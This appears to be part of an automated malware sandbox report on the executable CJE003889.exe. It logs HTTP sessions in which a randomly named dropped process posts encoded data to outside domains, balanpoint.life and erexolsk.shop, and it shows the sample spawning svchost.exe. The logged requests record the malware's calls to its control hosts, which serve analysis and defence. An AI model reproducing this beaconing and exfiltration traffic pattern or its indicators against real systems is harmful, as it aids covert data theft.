                                                        Dec 11, 2024 04:52:16.584924936 CET533INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:52:16 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.449987209.74.79.40805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:18.026133060 CET10914OUTPOST /0cbv/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.balanpoint.life
                                                        Origin: http://www.balanpoint.life
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 10304
                                                        Referer: http://www.balanpoint.life/0cbv/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 34 6e 4b 52 68 77 72 6a 6d 2b 5a 6f 36 46 30 56 42 6a 56 42 44 6d 46 55 52 48 33 39 30 66 64 54 4e 61 66 38 45 72 2b 30 4f 49 58 73 54 7a 4e 39 6d 62 4f 38 47 4b 49 49 51 50 6f 38 48 55 36 4a 69 32 68 6a 63 61 47 34 78 4f 4d 52 76 79 64 68 4a 6e 4a 42 42 71 62 75 2f 54 30 54 41 72 75 62 7a 68 42 6e 38 6c 6d 59 58 68 50 75 76 4b 44 48 6a 31 43 74 46 2f 66 56 7a 4b 33 77 31 62 6c 6d 32 76 49 65 74 34 49 59 33 58 51 55 79 69 30 72 48 64 79 59 4b 38 4a 4e 4c 6f 64 5a 70 4d 6a 77 56 30 51 75 5a 4d 2b 48 73 53 37 61 45 55 75 4d 5a 75 76 68 4d 62 51 4b 72 6a 38 36 50 62 72 62 44 54 52 62 54 47 4f 75 65 2b 73 59 68 68 79 34 63 6e 6c 66 33 61 72 31 76 73 5a 79 6e 49 47 2b 41 7a 63 59 44 76 79 52 61 44 46 56 33 68 44 2f 4f 32 4a 43 6c 69 47 44 34 35 61 49 74 72 6d 39 65 79 73 2f 6a 62 5a 2b 6c 68 52 45 38 6b 36 6c 48 71 2b 43 66 68 73 31 59 51 30 55 77 4a 6d 4c 76 4d 4d 47 31 59 7a 48 5a 47 41 6d 69 34 56 6b 64 36 61 59 63 48 67 2b 67 34 59 4a 4d 39 56 4c 69 70 4c 35 52 78 38 6d 6e 46 [TRUNCATED]
                                                        Data Ascii: gnlxDxt=4nKRhwrjm+Zo6F0VBjVBDmFURH390fdTNaf8Er+0OIXsTzN9mbO8GKIIQPo8HU6Ji2hjcaG4xOMRvydhJnJBBqbu/T0TArubzhBn8lmYXhPuvKDHj1CtF/fVzK3w1blm2vIet4IY3XQUyi0rHdyYK8JNLodZpMjwV0QuZM+HsS7aEUuMZuvhMbQKrj86PbrbDTRbTGOue+sYhhy4cnlf3ar1vsZynIG+AzcYDvyRaDFV3hD/O2JCliGD45aItrm9eys/jbZ+lhRE8k6lHq+Cfhs1YQ0UwJmLvMMG1YzHZGAmi4Vkd6aYcHg+g4YJM9VLipL5Rx8mnFsL8ffh0BH7FhPcUK212NXP6iHNqouCbVZshgO5foDq+l5rHqVm5NHODoEBxEw67TUjGrS+eBZWZGdSvKIOu+96mNocoueRn0c49DTRcvaFVEBIvD0018zB+Uojfm4MGsZhf7znSWiPXV7ytG8aBCZ+d4mokCasFIaXnwY60YF2OaNsohoriN8DRX77/Gp5SgltuLNukhzVFWK0QxmGYNG7LhzHeZVDOKBEHh+cBLNqIhSi9RQ+SLm1Sij+fhp1PTtCHWlIwwouqCxaTnsampv6DamOZpMAhlJuIfm7iAKtzGQ53jYRmYYqSGe5pgl7IbbYA9cuWeWrjDGMQPf8eMC/4V1QPzfnSgEaRGLjoOctaRO7VQu5JFb1ue9CJXXnDDGySBv0AOWfSIjJHSnD7Hh8IA38R2KdTECyYrG31yO1aHrF58pQRzg2D0lG1WCHiL4LdPofpsvPZDzd4irJd2kF3PiM1K6ITGwvSrwSeKe29MQ0ue647Ug6k4uJCdMAfBt7X/dAbPwdQ/TrwKgMMZK9wD42/83ATr4RXOpQmMh9VqBL4xeXP0vtrYDFX03d6TW1OPCLPeJOY6CC68FxIf3xgUKeh0Vb5nfXOUwZn1DS7T7+KZ5te3Ex0VqSkik1vC6dhoLbH4CbpXexD+cSiIXIfLyLtOccFb8o [TRUNCATED]
                                                        Dec 11, 2024 04:52:19.304116964 CET533INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:52:19 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.449993209.74.79.40805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:20.678031921 CET541OUTGET /0cbv/?Cpbp2=zjh46zEHi&gnlxDxt=1lixiFn2nPh88HonPghJDFAFcnnzyrdvNvLcEc2wPpGyfhd+75GCEpQKEfA1MXagijVYaOCU2MEqrz5pMxxhEIji4Qs6Ro2dwyRTrjDFXU7ZlJam3DSGN9g= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.balanpoint.life
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Dec 11, 2024 04:52:21.917340994 CET548INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:52:21 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.45001413.228.81.39805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:27.769006014 CET806OUTPOST /jh0k/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.erexolsk.shop
                                                        Origin: http://www.erexolsk.shop
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 204
                                                        Referer: http://www.erexolsk.shop/jh0k/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 52 47 57 43 7a 72 73 4f 6a 4a 32 74 2f 74 4a 53 74 68 73 35 41 74 4d 49 67 52 72 6f 69 57 56 6d 31 74 79 64 32 32 39 78 2b 37 54 51 4e 72 70 64 76 48 70 70 7a 62 54 6b 47 37 39 4a 56 68 4c 77 30 2b 43 66 59 4f 68 52 66 4e 73 73 39 61 73 55 39 79 64 77 34 5a 6c 70 56 55 61 34 45 2b 69 52 66 44 79 70 6c 2f 59 32 62 49 53 70 42 51 77 61 49 38 2b 6b 54 4c 37 4f 4d 54 5a 50 34 2b 30 4d 58 51 51 69 38 50 6a 4c 4e 4d 65 2b 33 34 47 6e 4e 6a 67 2f 4e 2b 4b 69 56 68 50 61 4d 69 79 44 59 2f 41 47 65 58 48 50 2b 47 57 70 55 51 67 4b 54 4c 33 4a 49 67 45 55 6d 73 48 58 5a 72 34 76 6e 77 3d 3d
                                                        Data Ascii: gnlxDxt=RGWCzrsOjJ2t/tJSths5AtMIgRroiWVm1tyd229x+7TQNrpdvHppzbTkG79JVhLw0+CfYOhRfNss9asU9ydw4ZlpVUa4E+iRfDypl/Y2bISpBQwaI8+kTL7OMTZP4+0MXQQi8PjLNMe+34GnNjg/N+KiVhPaMiyDY/AGeXHP+GWpUQgKTL3JIgEUmsHXZr4vnw==
                                                        Dec 11, 2024 04:52:29.341694117 CET364INHTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Wed, 11 Dec 2024 03:52:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.erexolsk.shop/jh0k/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.45002013.228.81.39805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:30.431706905 CET826OUTPOST /jh0k/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.erexolsk.shop
                                                        Origin: http://www.erexolsk.shop
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 224
                                                        Referer: http://www.erexolsk.shop/jh0k/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 52 47 57 43 7a 72 73 4f 6a 4a 32 74 38 4f 52 53 71 47 59 35 56 64 4d 4c 38 42 72 6f 6f 32 56 69 31 74 2b 64 32 7a 4e 68 2b 4e 6a 51 4e 4b 5a 64 2b 32 70 70 79 62 54 6b 4f 62 38 69 4b 78 4c 6e 30 2b 50 69 59 4c 5a 52 66 4d 49 73 39 61 63 55 39 46 4a 7a 34 4a 6c 72 64 30 61 74 41 2b 69 52 66 44 79 70 6c 2f 63 49 62 49 4b 70 42 6a 6f 61 61 4e 2b 6c 4e 37 37 52 4c 54 5a 50 38 2b 31 48 58 51 51 36 38 4f 75 75 4e 4a 43 2b 33 35 32 6e 4e 77 34 34 44 2b 4b 6b 4b 52 4f 78 43 79 54 4a 63 75 6c 6f 58 6b 44 4f 35 48 57 50 56 57 74 51 43 36 57 65 61 67 67 6e 37 72 4f 6a 55 6f 46 6d 38 30 2f 4f 45 54 74 48 34 6e 35 79 5a 71 4c 46 4d 4c 50 42 51 66 55 3d
                                                        Data Ascii: gnlxDxt=RGWCzrsOjJ2t8ORSqGY5VdML8Broo2Vi1t+d2zNh+NjQNKZd+2ppybTkOb8iKxLn0+PiYLZRfMIs9acU9FJz4Jlrd0atA+iRfDypl/cIbIKpBjoaaN+lN77RLTZP8+1HXQQ68OuuNJC+352nNw44D+KkKROxCyTJculoXkDO5HWPVWtQC6Weaggn7rOjUoFm80/OETtH4n5yZqLFMLPBQfU=
                                                        Dec 11, 2024 04:52:32.004187107 CET364INHTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Wed, 11 Dec 2024 03:52:31 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.erexolsk.shop/jh0k/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.45002613.228.81.39805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:33.095495939 CET10908OUTPOST /jh0k/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.erexolsk.shop
                                                        Origin: http://www.erexolsk.shop
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 10304
                                                        Referer: http://www.erexolsk.shop/jh0k/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 52 47 57 43 7a 72 73 4f 6a 4a 32 74 38 4f 52 53 71 47 59 35 56 64 4d 4c 38 42 72 6f 6f 32 56 69 31 74 2b 64 32 7a 4e 68 2b 4f 44 51 4e 5a 42 64 76 68 56 70 31 62 54 6b 50 62 38 68 4b 78 4c 36 30 39 2f 75 59 4c 6c 72 66 50 67 73 39 35 55 55 37 33 78 7a 74 35 6c 72 43 6b 62 4b 45 2b 69 68 66 44 69 6c 6c 2f 73 49 62 49 4b 70 42 6c 45 61 4b 4d 2b 6c 50 37 37 4f 4d 54 5a 31 34 2b 31 76 58 54 67 45 38 4f 71 51 4e 61 61 2b 77 61 4f 6e 42 6a 63 34 4c 2b 4b 6d 4c 52 4f 70 43 79 66 4b 63 75 35 4f 58 6e 65 72 35 48 69 50 58 67 68 54 62 70 65 36 4c 32 67 57 67 38 75 2f 59 6f 4e 4e 7a 57 7a 51 4e 77 39 48 73 30 39 4f 54 4b 75 55 57 6f 6e 42 4f 70 36 50 6d 79 2b 51 7a 64 2b 6f 50 62 65 43 43 2b 35 2b 38 52 7a 79 2b 32 6c 4c 33 54 6a 4a 61 54 79 6f 4d 4e 4f 65 32 79 6d 42 4d 30 6a 47 63 37 4c 56 61 5a 50 51 50 4d 6a 69 48 55 4b 74 6f 65 63 47 51 41 62 6f 66 45 52 53 49 64 4a 65 64 52 41 79 61 51 41 71 53 59 2b 6e 2b 35 64 4a 4a 54 6b 6f 2b 76 73 6b 63 62 42 52 55 6a 4e 37 53 66 6a 72 48 77 [TRUNCATED]
                                                        Data Ascii: gnlxDxt=RGWCzrsOjJ2t8ORSqGY5VdML8Broo2Vi1t+d2zNh+ODQNZBdvhVp1bTkPb8hKxL609/uYLlrfPgs95UU73xzt5lrCkbKE+ihfDill/sIbIKpBlEaKM+lP77OMTZ14+1vXTgE8OqQNaa+waOnBjc4L+KmLROpCyfKcu5OXner5HiPXghTbpe6L2gWg8u/YoNNzWzQNw9Hs09OTKuUWonBOp6Pmy+Qzd+oPbeCC+5+8Rzy+2lL3TjJaTyoMNOe2ymBM0jGc7LVaZPQPMjiHUKtoecGQAbofERSIdJedRAyaQAqSY+n+5dJJTko+vskcbBRUjN7SfjrHw/BN3glMfyVw1EA44+ZqlSqFUmx0K4rjjghF5/dzSVh9fIH26rcgFq9LCQHC8hT/9HfFDQLZ+gy1Bo6gIpbuR32xQcABB8dywilpxt2rk0iV1sTI0St9FTa1rj7/vaj0rBNEuArpobfd3h5flxoT03aNgkhD1dMaRGNQoM3H8kpoyQET05WCsft6TbSeJxVneXIzd87GUhocD/69w+1V84/qIN9kIb6b1jvV+F3TZISCet98R0RtQ7qQoC2o6CviNGMiqC9NPQdihVyKSS7qYb3mGIf7cgqMoWGpHFfEsGM4T9bMNhgrwO3f3XlCnoahb4WT8KM2N7jMGyw/y7/QOZYnd0APaDYhM1GIZu45JsoTZRiaNtU7OHybS3JQ0PrwlKyum3YQAleXLQjnQNbvE5Qhrk+EDAEN0FCmQULMh6DNgLQrtvLeIHMqgSs3/KZEciNuUlZbEXmleeUK8w75YMdHeVWcYtsPCvMwsTLwf/pk7aut+dByQi61Yzr9soxI1JGECN0zRDoTQGpW8Auk9VQxFiOlerWyOmVnzmbo57qv1spdate4FNjTOeX3EaeilFon1de5aZ2m9iBuN9GQF12xw0vOWznxAJZxxXl0g2Ysj3jcToiXUiKJ+wkGowhlECFw+GQNgonqdbj08Rx+dY7KoF6vpJ+RGuw [TRUNCATED]
                                                        Dec 11, 2024 04:52:34.676851988 CET364INHTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Wed, 11 Dec 2024 03:52:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.erexolsk.shop/jh0k/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.45003113.228.81.39805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:52:35.753976107 CET539OUTGET /jh0k/?gnlxDxt=cE+iwc0yj830uuhklCcrX/wOzR3WnF1m5/XKwWZdu8qZVYJFuXJD1Zapdap+RxDw3ImSWqBjcd0u94ZA4St+7Z5LUmDNQvXJfTb2ufMRWduIOzpab4DfT5A=&Cpbp2=zjh46zEHi HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.erexolsk.shop
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Dec 11, 2024 04:52:37.334223032 CET509INHTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Wed, 11 Dec 2024 03:52:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.erexolsk.shop/jh0k/?gnlxDxt=cE+iwc0yj830uuhklCcrX/wOzR3WnF1m5/XKwWZdu8qZVYJFuXJD1Zapdap+RxDw3ImSWqBjcd0u94ZA4St+7Z5LUmDNQvXJfTb2ufMRWduIOzpab4DfT5A=&Cpbp2=zjh46zEHi
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:22:49:35
                                                        Start date:10/12/2024
                                                        Path:C:\Users\user\Desktop\CJE003889.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\CJE003889.exe"
                                                        Imagebase:0xc60000
                                                        File size:1'229'312 bytes
                                                        MD5 hash:701F58C31461426D9DD6FAFCD8ADCD33
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:22:49:38
                                                        Start date:10/12/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\CJE003889.exe"
                                                        Imagebase:0xce0000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
